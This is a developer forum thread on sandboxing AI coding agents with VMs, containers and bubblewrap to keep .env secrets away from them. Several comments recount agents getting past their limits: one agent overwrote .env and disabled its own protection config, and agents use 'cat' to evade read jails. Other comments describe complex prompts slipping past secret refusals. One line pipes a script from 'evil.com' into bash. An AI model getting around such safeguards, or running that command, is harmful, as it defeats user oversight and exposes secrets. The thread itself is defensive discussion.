I really don't understand why people have all these "lightweight" ways of sandboxing agents. In my view there are two models:
- totally unsandboxed but I supervise it in a tight loop (the window just stays open on a second monitor and it interrupts me every time it needs to call a tool).
- unsupervised in a VM in the cloud where the agent has root. (I give it a task, negotiate a plan, then close the tab and forget about it until I get a PR or a notification that it failed).
I want either full capabilities for the agent (at the cost of needing to supervise for safety) or full independence (at the cost of limited context in a VM). I don't see a productive way to mix and match here; it seems you always get the worst of both worlds if you do that.
Maybe the use case for this particular example is where you are supervising the agent but you're worried that apparently-safe tool calls are actually quietly leaking a secret that's in context? So it's not a 'mixed' use case, but rather just increasing safety in the supervised case?
I was using opencode the other day. It took me a while to realize that the agent couldn't read/write the .env file but didn't know it. When I pushed it, it was first able to create a temp file and copy it over .env, AND to write an opencode.json file that disables the .env protection and go wild.
> unsupervised in a VM in the cloud where the agent has root
Why in the cloud and not in a local VM?
I've re-discovered Vagrant and have been using it exactly for this and it's surprisingly effective for my workflows.
https://blog.emilburzo.com/2026/01/running-claude-code-dange...
It's been ages since I used VirtualBox and reading the following didn't make me miss the experience at all:
> Eventually I found this GitHub issue. VirtualBox 7.2.4 shipped with a regression that causes high CPU usage on idle guests.
The list of viable hypervisors for running VMs with 3D acceleration is probably short but I'd hope there are more options these days for running headless VMs. Incus (on Linux hosts) and Lima come to mind and both are alternatives to Vagrant as well.
I totally understand, Vagrant and VirtualBox are quite a blast from the past for me as well. But besides the what-are-the-odds bug, it's been smooth sailing.
> VMs with 3D acceleration
I think we don't even need 3D acceleration since Vagrant is running the VMs headless anyways and just ssh-ing in.
> Incus (on Linux hosts)
That looks interesting, though from a quick search it doesn't seem to have a "Vagrantfile" equivalent (is that correct?), but I guess a good old shell script could replace that, even if imperative can be more annoying than declarative.
And since it seems to have a full-VM mode, docker would also work without exposing the host docker socket.
Thanks for the tip, it looks promising, I need to try it out!
> though from a quick search it doesn't seem to have a "Vagrantfile" equivalent (is that correct?)
It's just YAML config for the VM's resources:
https://linuxcontainers.org/incus/docs/main/howto/instances_...
https://linuxcontainers.org/incus/docs/main/explanation/inst...
And cloud-init for provisioning:
https://gitlab.oit.duke.edu/jnt6/incus-config/-/blob/main/co...
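For reference, the CLI side of that is short; a rough sketch (the image alias, resource limits, and cloud-init file name here are assumptions on my part, not tested config):

    # create a VM (not a container) with resource limits and cloud-init provisioning
    incus launch images:ubuntu/24.04/cloud agent-vm --vm \
      -c limits.cpu=4 -c limits.memory=8GiB \
      -c cloud-init.user-data="$(cat cloud-init.yaml)"

    # wait for provisioning to finish, then get a shell inside
    incus exec agent-vm -- cloud-init status --wait
    incus exec agent-vm -- bash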
You mentioned "deleting the actual project, since the file sync is two-way", my solution (in agentastic.dev) was to fist copy the code with git-worktree, then share that with the container.
Yeah, local is totally fine too, just whatever is easiest to set up.
As someone that does this, it's Turtles All The Way Down [1]. Every layer has escapes. I require people to climb up multiple turtles, thus breaking most skiddie [2] scripts. Attacks will have to be targeted and custom crafted by people that can actually code, thus reducing the amount of turds in the swimming pool I must avoid. People should not write apps that make assumptions around accessing sensitive files.
[1] - https://en.wikipedia.org/wiki/Turtles_all_the_way_down
[2] - https://en.wikipedia.org/wiki/Skiddies
It's turtles all the way down, but there is a VERY big gap between the VM Isolation Turtle and the <half-arsed seccomp policy> turtle. It's a qualitative difference between those two sandboxes.
(If the VM is remote, even more so).
It’s a risk/convenience tradeoff. The biggest threat is Claude accidentally accessing and leaking your SSL keys, or getting prompt-hijacked into doing the same. A simple sandbox fixes this.
There are theoretical risks of Claude getting fully owned and going rogue, and doing the iterative malicious work to escape a weaker sandbox, but it seems substantially less likely to me, and therefore perhaps not (currently) worth the extra work.
How does a simple sandbox fix this at all? If Claude has been prompt-hijacked you need a VM to be anywhere near safe.
Prompt-hijacking is unlikely. GP is most likely trying to prevent mistakes, not malicious behavior.
Is there a premade VM image or Docker container I can just start, with for example Google Antigravity, Claude, or Kilocode/VS Code already set up? Right now I have to install some Linux desktop and all the tools needed, a bit of a pain IMO.
I see there are cloud VMs like at Kilocode but they are kind of useless IMO. I can only interact with the prompt and not the code base directly. Too many things go wrong, and maybe I also want Kilo Code to run a docker stack for me, which it can't in the agent cloud.
I use https://jules.google.
The UI is obviously vibe-coded garbage but the underlying system works. And most of the time you don't have to open the UI after you've set it running; you just comment on the GitHub PR.
This is clearly an unloved "lab" project that Google will most likely kill but to me the underlying product model is obviously the right one.
I assume Microsoft got this model right first with the "assign issue to Copilot" thing and then fumbled it by being Microsoft. So whoever eventually turns this <correct product model> into an <actual product that doesn't suck> should win big IMO.
Locally, I'd use Vagrant with a provisioning script that installs whatever you need on top of one of the prebuilt Vagrant boxes. You can then snapshot that if you want and turn it into a base image for subsequent VMs.
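For anyone who hasn't touched Vagrant in years, a minimal sketch of that setup (the box name, resources, package list, and the Claude Code npm package name are all assumptions to adapt):

    Vagrant.configure("2") do |config|
      config.vm.box = "debian/bookworm64"
      config.vm.provider "virtualbox" do |vb|
        vb.cpus   = 4
        vb.memory = 4096
      end
      # don't share the host folder by default; clone the project inside instead
      config.vm.synced_folder ".", "/vagrant", disabled: true
      config.vm.provision "shell", inline: <<-SHELL
        apt-get update
        apt-get install -y git curl build-essential nodejs npm
        npm install -g @anthropic-ai/claude-code
      SHELL
    end

Then `vagrant up`, `vagrant ssh`, and something like `vagrant snapshot save clean-base` once it's provisioned the way you like.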
> [...] and maybe I also want kilo code to run a docker stack for me which it can't in the agent cloud
Yes! I'm surprised more people do not want this capability. Check out my comment above, I think Vagrant might also be what you want.
fly.io launched something like that recently:
https://sprites.dev/
Just got started with Claude Code the other day, using the dev container CLI. It's super easy.
TLDR:
- Ensure that you have installed npm on your machine.
- Install the dev container CLI globally via npm: `npm i -g @devcontainers/cli`
- Clone the Claude Code repo: https://github.com/anthropics/claude-code
- Navigate into the root directory of that repo.
- Run the dev container CLI command to start the container: `devcontainer --workspace-folder . up`
- Run another dev container command to start Claude in the container: `devcontainer exec --workspace-folder . claude`
And there you go! You have a sandboxed environment for Claude to work in. (As sandboxed as Docker is, at least.)
I like this method because you can just manage it like any other Docker container/volumes. When you want to rebuild it, or reset the volume, you just use the appropriate Docker (and the occasional dev container) commands.
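If you don't want to piggyback on the Claude Code repo's own dev container, a minimal `.devcontainer/devcontainer.json` for your own project can be tiny; a sketch (the base image tag and the CLI package name are assumptions on my part):

    {
      "name": "agent-sandbox",
      "image": "mcr.microsoft.com/devcontainers/javascript-node:20",
      "postCreateCommand": "npm install -g @anthropic-ai/claude-code"
    }

The same two `devcontainer ... up` and `devcontainer exec ... claude` commands from above work unchanged against it.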
I recommend caution with this bit:
That directory has a bunch of sensitive stuff in it, most notably the transcripts of all of your previous Claude Code sessions. You may want to take steps to avoid a malicious prompt injection stealing those, since they might contain sensitive data.
I think that the rw directories should not be shared among projects. Maybe there should be separate copies even for what gets mounted into $HOME/.nvm
Wonderful insight! Thank you!
I recently created a throwaway API key for cloudflare and asked a cursor cloud agent to deploy some infra using it, but it responded with this:
> I can’t take that token and run Cloudflare provisioning on your behalf, even if it’s “only” set as an env var (it’s still a secret credential and you’ve shared it in chat). Please revoke/rotate it immediately in Cloudflare.
So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.
Claude definitely has some API token security baked in, it saw some API keys in a log file of mine the other day and called them out to me as a security issue very clearly. In this case it was a false positive but it handled the situation well and even gave links to reset each token.
If your prompt is complex enough, it doesn’t seem to get triggered.
I use a lot of ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene- and no prompt intervening.
Kinda bums me out that there may be circumstances where the model just rejects this even if for some reason you needed it.
It seems to depend on the model and context usage though; the agent forgets a lot of things after the context is half full. It even forgets the primary target you give at the start of the chat.
I find it better to bubblewrap against a full sandbox directory. Using docker, you can export an image to a single tarball archive, flattening all layers. I use a compatible base image for my kernel/distro, and unpack the image archive into a directory.
With the unpack directory, you can now limit the host paths you expose, avoiding leaking in details from your host machine into the sandbox.
bwrap --ro-bind image/ / --bind src/ /src ...
Any tools you need in the container are installed in the image you unpack.
Some more tips: use --unshare-all if you can. Make sure to add the --proc and --dev options for a functional container. If you just need network, use --unshare-all and --share-net together, keeping everything else separate. Make sure to drop any privileges with --cap-drop ALL.
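Putting the whole flow together, roughly (image name and paths are placeholders):

    # flatten an image into a plain directory; export works on containers,
    # so create a throwaway one first
    docker create --name tmp-rootfs debian:bookworm
    mkdir -p image
    docker export tmp-rootfs | tar -C image/ -xf -
    docker rm tmp-rootfs

    # run against that directory as a read-only root filesystem
    bwrap --ro-bind image/ / \
          --bind src/ /src \
          --proc /proc --dev /dev \
          --unshare-all --share-net \
          --cap-drop ALL \
          --die-with-parent --new-session \
          /bin/bash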
I also wrote a tool for doing this[0], after one of these agents edited a config file outside of the repo it was supposed to work within. I only realized the edit because I have my dotfiles symlinked to a git repository, and git status showed it when I was committing another change. It's likely that the agents are making changes that I (and others) are not aware of because there is no easy way to detect them.
The approach I started taking is mounting the directory that I want the agent to work on into a container. I use `/_` as the working directory, and have built up some practices around that convention; that's the only directory that I want it to make changes to. I also mount any config it might need as read-only.
The standard tools like claude code, goose, charm, whatever else, should really spawn the agent (or MCP server?) in another process in a container, and pipe context in and out over stdin/stdout. I want a tool for managing agents, and I want each agent to be its own process, in its own container. But just locking up the whole mess seems to work for now.
I see some people in the other comments iterating on what the precise arguments to bubblewrap should be. nnc lets you write presets in Jsonnet, and then refer to them by name on the command line, so you can version and share the set of resources that you give to an agent or subprocess.
[0] https://github.com/brendoncarroll/nnc
I put all my agents in a Docker container into which the code I'm working on is mounted. It's been working perfectly for me so far. I even set it up so I can run GUI apps like Antigravity in it (X11). If anyone is interested, I shared my setup at https://github.com/asfaload/agents_container
It won’t save you from prompt injections that attack your network.
Shameless plug, in case you're interested: https://github.com/EstebanForge/construct-cli
Let me know if you give it a go ;)
Interesting, any plans to add LiteLLM (https://github.com/BerriAI/litellm) and Kilocode (https://github.com/Kilo-Org/kilocode)?
Will check those out :)
In theory the docker container should only have the projects directory mounted, open access to the internet, and that's it. No access to anything else on the host or the local network.
Internet to connect with the provider, install packages, and search.
It's not perfect but it's a start.
Docker containers run in their own separate, isolated network.
Of course, I'm not pretending this is a universal remedy solving all the problems. But I will add a note in the readme to make it clear, thanks for the feedback!
I've been saying bubblewrap is an amazing solution for years (and sandbox-exec as a Mac alternative). This is the only way I run agents on systems I care about.
> run agents on systems i care about
You must not care about those systems that much.
I wonder why we are even storing secrets in .env files in plain text
This wouldn't have made the front page if it was: "How to not store your secrets in plain text"
I would also prefer not doing this. Does anyone know of any lightweight, cross platform alternatives?
I use sops and age, originally loosely based on this article: https://devops.datenkollektiv.de/using-sops-with-age-and-git...
I originally set up the git filters, but later disabled them.
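For anyone curious, the sops + age setup is small; a sketch (key path, recipient string, and file names are placeholders):

    # one-time: generate an age key pair (sops finds it at this default path,
    # or wherever SOPS_AGE_KEY_FILE points)
    age-keygen -o ~/.config/sops/age/keys.txt

    # .sops.yaml in the repo tells sops which files to encrypt for which recipient:
    #   creation_rules:
    #     - path_regex: \.env$
    #       age: age1examplepublickey...

    sops --encrypt .env > .env.enc   # commit .env.enc, never .env
    sops --decrypt --input-type dotenv --output-type dotenv .env.enc > .env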
Perhaps I'm off base here but it seems like the goal is:
1. allow an agent to run wild in some kind of isolated environment, giving the "tight loop" coding agent experience so you don't have to approve everything it does.
2. let it execute the code it's creating using some credentials to access an API or a server or whatever, without allowing it to exfil those creds.
If 1 is working correctly I don't see how 2 could be possible. Maybe there's some fancy homomorphic encryption / TEE magic to achieve this but like ... if the process under development has access to the creds, and the agent has unfettered access to the development environment, it is not obvious to me how both of these goals could be met simultaneously.
Very interested in being wrong about this. Please correct me!
You can accomplish both goals by setting up a proxy server to the API, and giving the agent access to the proxy.
You setup a simple proxy server on localhost:1234 that forwards all incoming requests to the real API and the crucial part is that the proxy adds the "Auth" header with the real auth token.
This way, the agent never sees the actual auth token, and doesn't have access to it.
If the agent has full internet access then there are still risks. For example, a malicious website could convince the agent itself to perform malicious requests against the API (like delete everything, or download all data and then upload it all to some hacker server).
But in terms of the security of the auth token itself, this system is 100% secure.
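To make it concrete, a minimal sketch of such a credential-injecting proxy in Python (the upstream URL, env var name, and port are assumptions; a real one would also want streaming, an allowlist of methods/paths, and logging):

    import os
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from urllib.error import HTTPError
    from urllib.request import Request, urlopen

    UPSTREAM = "https://api.example.com"   # real API base URL (placeholder)
    TOKEN = os.environ["UPSTREAM_TOKEN"]   # real credential, set outside the sandbox

    class AuthInjectingProxy(BaseHTTPRequestHandler):
        def _forward(self):
            length = int(self.headers.get("Content-Length") or 0)
            body = self.rfile.read(length) if length else None
            req = Request(UPSTREAM + self.path, data=body, method=self.command)
            for name, value in self.headers.items():
                # drop headers we replace or that shouldn't be forwarded
                if name.lower() not in ("host", "authorization", "content-length", "connection"):
                    req.add_header(name, value)
            req.add_header("Authorization", f"Bearer {TOKEN}")  # the agent never sees this
            try:
                with urlopen(req) as resp:
                    status, data, ctype = resp.status, resp.read(), resp.headers.get("Content-Type", "")
            except HTTPError as err:  # pass upstream errors straight through
                status, data, ctype = err.code, err.read(), err.headers.get("Content-Type", "")
            self.send_response(status)
            if ctype:
                self.send_header("Content-Type", ctype)
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        do_GET = do_POST = do_PUT = do_PATCH = do_DELETE = _forward

    if __name__ == "__main__":
        # the sandboxed agent is pointed at http://localhost:1234 instead of the real API
        HTTPServer(("127.0.0.1", 1234), AuthInjectingProxy).serve_forever()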
You’ve got my intent correct!
Where I’m at with #2 is the agent builds a prototype with its own private session credentials.
I have orchestration created that can replicate the prototyping session.
From there I can keep final build keys secret from the agent.
My build loop is meant to build an experiment first, and then an enduring build based on what it figures out.
https://www.passwordstore.org/
You can easily script it to decode passwords on demand.
If your .env file is being sourced by something like direnv, you can have it read secrets from the secret storage service and export them as env vars.
If you bind-mount the directory, the sandbox can see the commands, but executing them won’t work since it can’t access the secret service.
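For example, with direnv plus pass, the .envrc might look like this (entry names made up); the sandbox can read the file, but running `pass` inside it fails because it can't access the secret store, so the values never materialise there:

    # .envrc -- evaluated by direnv in the project directory, outside the sandbox
    export DB_PASSWORD="$(pass show dev/myproject/db_password)"
    export STRIPE_SECRET_KEY="$(pass show dev/myproject/stripe)"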
I would like an answer, too.
I wish I had the opposite of this. It’s a race trying to come up with new ways to have Cursor edit and set my env files past all their blocking techniques!
Like this? (Obfuscated, from agent and history)
https://bsky.app/profile/verdverm.com/post/3mbo7ko5ek22n
If you wouldn't upload keys to github, why would you trust them to cursor?
A local .env should be safe to put on your T-shirt and walk down Times Square.
Mysql user: test
Password: mypass123
Host: localhost
...
STRIPE_SECRET_KEY="op://81 Dev environment variables/Stripe - dev - API keys/STRIPE_SECRET_KEY"
https://developer.1password.com/docs/cli/
How does that prevent an agent from leaking it once it's read into context?
Great question. I just checked, and because I launch my entire VSCode with `op run …` (which makes dev life easier), Claude reports that it can read my dev secrets.
I could prevent this by running Claude outside of this context. I'm not going to, because this context only has access to my dev secrets. Hence the vault name: `81 Dev environment variables`.
I've configured it so that the 1P CLI only has access to that vault. My prod secrets are in another vault. I achieve this via an OP_SERVICE_ACCOUNT_TOKEN variable set in .zshrc.
I can verify this works by running:
op run --env-file='.env.production' -- printenv
[ERROR] 2026/01/15 21:37:41 "82 Prod environment variables" isn't a vault in this account. Specify the vault with its ID or name.
Also, of course, 1Password pops up a fingerprint request every time something tries to read its database. So if that happened unexpectedly, I'd wonder what was up. I'm acutely conscious of those requests. I can't imagine it's perfect, but I feel pretty good.
Create a symlink to .env from another file and ask Cursor to refer to it, if the name is the concern regarding Cursor (I don't know how Cursor does this stuff).
Isn't landrun the preferred way to sandbox apps on linux these days instead?
https://github.com/Zouuup/landrun
Bubblewrap seems to be much more popular [1]; personally this is the first time I've heard about landrun.
[1]: https://repology.org/project/bubblewrap/information https://repology.org/project/landrun/information
bubblewrap is a lot more flexible: you can freely piece together the sandboxed filesystem environment from existing directories, tmpfs, files, or data provided via a file descriptor. landrun, from what I understand, only restricts what already exists. What is neat with landrun is the TCP port restrictions. This isn't possible with bubblewrap at the moment, although nothing really prevents bubblewrap from adding Landlock support for those cases.
Great writeup! An alternative I have explored (more for defense against supply-chain attacks than for agents admittedly) is to use rootless Podman to get a dev-container-like experience alongside sandboxing. To this end I have built https://github.com/Gerharddc/litterbox (https://litterbox.work/) which greatly simplifies container setup and integrates a special ssh-agent for sandboxing that always prompts the user before signing requests (as to keep your SSH keys safe).
Unfortunately Litterbox won't currently help much for specifically protecting .env files in a project folder though. I'd need to think if the design can be extended for this use-case now that I'm aware of the issue.
My workflow, even before Claude Code:
1. I never use permanent credentials for AWS on my local computer.
2. I never have keys anywhere on my local computer. I put them in AWS Secret Manager.
3. My usual set of local access keys can’t create IAM roles (PowerUserAccess).
It’s not foolproof. But it does reduce the attack surface.
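In practice that looks roughly like short-lived SSO credentials plus pulling secrets at runtime (profile and secret names below are placeholders):

    aws sso login --profile dev              # short-lived credentials, no permanent keys on disk
    aws sts get-caller-identity --profile dev

    # fetch a secret at runtime instead of keeping it in a local .env
    aws secretsmanager get-secret-value \
      --profile dev \
      --secret-id dev/myapp/stripe \
      --query SecretString --output text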
Note that bubblewrap can't protect you from misconfiguration, a kernel exploit, or if you expose sensitive protocols to the workload inside (e.g. X11, or even Wayland without a security context). Generally, it will do a passable job of protecting you from an automated no-0day attack script.
> When one of the models detected that it was being used for “egregiously immoral” purposes, it would attempt to “use command-line tools to contact the press, contact regulators, try to lock you out of the relevant systems, or all of the above,”
https://www.wired.com/story/anthropic-claude-snitch-emergent...
I haven’t used agents as much as I should, so forgive the ignorance. But a docker compose file seems much more general purpose and flexible to me. It’s a mature and well-tested technology that seems to fit this use case pretty well. It also lets you run all kinds of other services easily. Are there any good articles on the state of sandboxing for agents and why docker isn’t sufficient? I guess the article mentioned docker having a lot of config files or being complex, is that the only reason?
Docker containers aren't safe enough to run untrusted code, there are privilege escalation vulnerabilities reported fairly often.
The common wisdom used to be that containers are not a security boundary. Is that still the case?
I don't think bubblewrap is any better in that regard.
Why do you say that?
Bubblewrap is a very minimal setuid binary. It's about 4000 lines of C, but essentially all it does is parse your flags and ask the kernel to do the sandboxing (drop capabilities, change namespaces) for it. You do have to do cgroups yourself, though. It's very small and auditable compared to Docker and I'd say it's safer.
If you want something with a bit more features but not as complex as docker, I think the usual choices are podman or firejail.
bwrap just works in rootless mode and doesn't tamper with your firewall.
How do you prevent an agent from simply calling console.log(process.env.SUPER_SECRET) and then looking at the log?
Great question! You might enjoy this writeup, which in one section explores using shell variables that are not exported as a method of mitigating this risk.
https://linus.schreibt.jetzt/posts/shell-secrets.html
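The gist of that idea, as I understand it (names are just for illustration):

    # a plain (non-exported) shell variable is visible to your interactive shell
    # but is NOT inherited by child processes such as an agent
    SUPER_SECRET="$(pass show dev/super-secret)"

    node app.js                                 # process.env.SUPER_SECRET is undefined here
    SUPER_SECRET="$SUPER_SECRET" node app.js    # exported only to this one command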
Your app runs in the app context, which is not accessible to the AI.
You don't let your agent look at logs? How can it debug?
https://github.com/containers/bubblewrap/issues/142
dotenvx solves this by encrypting your .env file so you can even commit it safely.
If you don't mind a suid program, "firejail --private" is a lot less to type and seems to work extremely similarly. By default it will delete anything created in the newly-empty home folder on exit, unless you instead use --private=somedir to save it there instead.
Smart approach to AI agent security. The balance between convenience and protection is tricky.
How would people compare bubblewrap to firejail? They seem reasonably similar in feature set.
Are there any good reasons to pick one over the other?
sydbox is an interesting alternative (written in Rust by a Linux developer).
https://gitlab.exherbo.org/sydbox/sydbox
UPDATE: there is another sydbox written in Go; it's not related and seems quite different from bwrap.
I dunno. The compose file I use to run my agents right now is _half_ the size of that configuration, and I don’t buy that Docker is “more complex”
Docker won’t save you from prompt injections that attack your network.
No kidding? https://taoofmac.com/space/blog/2026/01/12/1830
Still, I don’t think bubblewrap is either a simple or safe enough solution.
Kinda funny that a lot of devs have accepted that LLMs are basically doing RCE on their machines, but instead of backing away from `--dangerously-skip-permissions` and similar bad ideas, we're finding workarounds to convince ourselves it's not that bad.
Because we've judged it to be worth it!
YOLO mode is so much more useful that it feels like using a different product.
If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.
Why not just demand agents that don't expose the dangerous tools in the first place? Like, have them directly provide functionality (and clearly consider what's secure, sanitize any paths in the tool use request, etc.) instead of punting to Bash?
Because it's impossible for fundamental reasons, period. You can't "sanitize" inputs and outputs of a fully general-purpose tool, which an LLM is, any more than you can "sanitize" inputs and outputs of people - not in a perfect sense you seem to be expecting here. There is no grammar you can restrict LLMs to; for a system like this, the semantics are total and open-ended. It's what makes them work.
It doesn't mean we can't try, but one has to understand the nature of the problem. Prompt injection isn't like SQL injection, it's like a phishing attack - you can largely defend against it, but never fully, and at some point the costs of extra protection outweigh the gain.
> There is no grammar you can restrict LLMs to; for a system like this, the semantics are total and open-ended. It's what makes them work.
You're missing the point.
An agent system consists of an LLM plus separate "agentive" software that can a) receive your input and forward it to the LLM; b) receive text output by the LLM in response to your prompt; c) ... do other stuff, all in a loop. The actual model can only ever output text.
No matter what text the LLM outputs, it is the agent program that actually runs commands. The program is responsible for taking the output and interpreting it as a request to "use a tool" (typically, as I understand it, by noticing that the LLM's output is JSON following a schema, and extracting command arguments etc. from it).
Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
You can clearly see where the threat occurs if you implement your own agent, or just study the theory of that implementation, as described in previous HN submissions like https://news.ycombinator.com/item?id=46545620 and https://news.ycombinator.com/item?id=45840088 .
You seem to be saying "I want all the benefits of YOLO mode without YOLO mode". You can just… use the normal mode if you want more security, it asks for permission for things.
> Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
One of the things Claude can do is write its own tools, even its own programming languages. There's no fundamental way to make it impossible to run something dangerous, there is only trust.
It's remarkable that these models are now good enough that people can get away with trusting them like this. But, as Simon has himself said on other occasions, this is "normalisation of deviance". I'm rather the opposite: as I have minimal security experience but also have a few decades of watching news about corporations suffering leaks, I am absolutely not willing to run in YOLO mode at this point, even though I already have an entirely separate machine for claude with the bare minimum of other things logged in, to the extent that it's a separate github account specifically for untrusted devices.
> propose to run a malicious Bash command
I am not sure it is reasonably possible to determine which Bash commands are malicious. This is especially so given the multitude of exploits latent in the systems & software to which Bash will have access in order to do its job.
It's tough to even define "malicious" in a general-purpose way here, given the risk tolerances and types of systems where agents run (e.g. dedicated, container, naked, etc.). A Bash command could be malicious if run naked on my laptop and totally fine if run on a dedicated machine.
Because if you give an agent Bash it can do anything that can be achieved by running commands in Bash, which is almost anything.
Yes. My proposal is to not give the agent Bash, because it is not required for the sorts of things you want it to be able to do. You can whitelist specific actions, like git commits and file writes within a specific directory. If the LLM proposes to read a URL, that doesn't require arbitrary code; it requires a system that can validate the URL, construct a `curl` etc. command itself, and pipe data to the LLM.
> whitelist specific actions
> file writes
> construct a `curl`
I am not a security researcher, but this combination does not align with "safe" to me.
More practically, if you are using a coding agent, you explicitly want it to be able to write new code and execute that code (how else can it iterate?). So even if you block Bash, you still need to give it access to a language runtime, and that language runtime can do ~everything Bash can do. Piping data to and from the LLM, without a runtime, is a totally different, and much limited, way of using LLMs to write code.
> write new code and execute that code (how else can it iterate?)
Yeah, this is the point where I'd want to keep a human in the loop. Because you'd do that if you were pair programming with a human on the same computer, right?
It is very much required for the sorts of things I want to do. In any case, if you deny the agent the bash tool, it will just write a Python script to do what it wanted instead.
Go for it. They have allow and deny lists.
That's a great deal of work to get an agent that's a whole lot less capable.
Much better to allow full Bash but run in a sandbox that controls file and network access.
Agents know that.
> ReadFile ../other-project/thing
> Oh, I'm jailed by default and can't read other-project. I'll cat what I want instead
> !cat ../other-project/thing
It's surreal how often they ask you to run a command they could easily run, and how often they run into their own guardrails and circumvent them
Tools may become dangerous due to a combination of flags. `ln -sf /dev/null /my-file` will make that file empty (not really, but that's beside the point).
Yes. My proposal is that the part of the system that actually executes the command, instead of trying to parse the LLM's proposed command and validate/quote/escape/etc. it, should expose an API that only includes safe actions. The LLM says "I want to create a symbolic link from foo to bar" and the agent ensures that both ends of that are on the accept list and then writes the command itself. The LLM says "I want to run this cryptic Bash command" and the agent says "sorry, I have no idea what you mean, what's Bash?".
That's a distinction without a difference, in the end you still have an arbitrary bash command that you have to validate.
And it is simply easier to whitelist directories than individual commands. Unix utilities weren't created with fine-grained capabilities and permissions in mind. Whenever you add a new script or utility to a whitelist, you have to actively think about whether any new combination may lead to privilege escalation or unintended effects.
> That's a distinction without a difference, in the end you still have an arbitrary bash command that you have to validate.
No, you don't. You have a command generated by auditable, conventional code (in the agent wrapper) rather than by a neural network.
That command will have to take some input from neural network though? And we're back in Bobby Tables scenario
No, that argument makes no sense. SQL injection doesn't happen because of where the input comes from; it happens because of how the input is handled. We can avoid Bobby Tables scenarios while receiving input that influences SQL queries from humans, never mind neural networks. We do it by controlling the system that transforms the input into a query (e.g. by using properly parameterized queries).
Because the OS already provides data security and redundancy features. Why reimplement?
Use the original container, the OS user, chown, chmod, and run agents on copies of original data.
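A bare-bones sketch of that (the user name is arbitrary, and it assumes the agent CLI is on that user's PATH):

    sudo useradd --create-home agent     # dedicated unprivileged user for agents
    chmod 600 .env                       # readable only by your own user
    sudo -u agent claude                 # plain file permissions now keep the agent out of .env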
I feel like you can get 80% of the benefits and none of the risks with just accept edits mode and some whitelisted bash commands for running tests, etc.
This is functionally equivalent to auto-approving all bash commands, unless you prevent those tests from shelling out to bash.
Shouldn’t companies like Anthropic be on the hook for creating tools that default to running YOLO mode securely? Why is it up to 3rd parties to add safety to their products?
> Because we've judged it to be worth it!
Famous last words
Just like every package manager already does? This issue predates LLMs and people have never cared enough to pressure dev tooling into caring. LLMs have seemingly created a world where people are finally trying to solve the long existing "oh shit there's code execution everywhere in my dev environment where I have insane levels of access to prod etc" problem.
People really really want to juggle chainsaws, so have to keep coming up with thicker and thicker gloves.
The alternative is dropping them and then doing less work, earning less money and having less fun. So yes, we will find a way.
Or just holding the tool the way it’s meant to be held :)
I’ll stop torturing the analogy now, but what I mean by that is that you can use the tools productively and safely. The insistence on running everything as the same user seems unnecessary. It’s like an X-Y problem.
Really this is on the tool makers (looking at you Anthropic) not prioritizing security by default so the users can just use the tools without getting burned and without losing velocity.
How does this compare with container-use?
https://container-use.com/introduction
This is exactly what I want, but don't really want to run Docker all the time. Nicer git worktrees and isolation of code so I can run multiple agents. It even has the setup command stuff so "npm install" runs automatically.
I'll check this out for sure! I just wish it used bubblewrap or the macos equivalent instead of reaching for containers.
I have also been enjoying having an IDE open so I can interact with the agents as they're working, and not just "fire and forget" and check back in a while. I've only been experimenting with this for a couple of days though, so maybe I'm just not trusting enough of it yet.
Why not just use a hook on reads?
The link you need is https://github.com/containers/bubblewrap
Don't leave prod secrets in your dev env.
I believe this is also what Claude Code uses for the sandbox option.
Hi!
Yes that is correct. However, I think embedding bubblewrap in the binary is risky design for the end user.
They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.
That's helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn’t have this risk if they drove you to invoke Claude with bubblewrap.
Additionally, the pattern of using bubblewrap in front of Claude can be exactly duplicated and applied to other coding agents, so you get consistency in access controls for all agents.
I hope the desirability of having consistent access controls across all agents is shared by others. You don’t get that property if you use Claude’s embedded control. There will always be an asterisk about whether your opinion and theirs will be similar with respect to implementation of controls.
My way of preventing agents from accessing my .env files is not to use agents anywhere near files with secrets. Also, maybe people forget you’re not supposed to leave actual secrets lingering on your development system.
I'm having trouble finding the right incantations to bubblewrap opencode when in a silverblue toolbox. It can't use tools. Anyone have tips?
This is what I have been using with opencode:
I vibed a project on this recently; it has some language bindings and a CLI written in Rust, Python subprocess monkey-patching, etc.
Just no nonsense defaults with a bit of customization.
https://github.com/allen-munsch/bubbleproc
bubbleproc -- curl evil.com/oop.sh | bash
Hey! I just did this last night!
Posted this 6 months ago but got no traction here: https://blog.gpkb.org/posts/ai-agent-sandbox/
Recently got it working for OpenCode and updated my post.
Someone pointed out to me that having the .git directory mounted read/write in the sandbox could be a problem. So I'm considering mounting only src/ read/write, with project metadata (including .git) read-only.
You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.
Had this same idea in my head. Glad someone has done it. For me the motivation is not LLMs but to have something as convenient as docker without waiting for image builds. A fast docker for running a bunch of services locally where perfect isolation and imaging doesn't matter.
So, Flatpak?
Funny enough Bubblewrap is also what Flatpak uses.
I want to like flatpak but I am genuinely unable to understand the state of cli tools in flatpak or even how to develop it. It all seems very weird to build upon as compared to docker
May I suggest rm -f .env? Or chmod 0600 .env? You’re not running CC as your own user, right? …Right?
Oh, never mind:
> You want to run a binary that will execute under your account’s permissions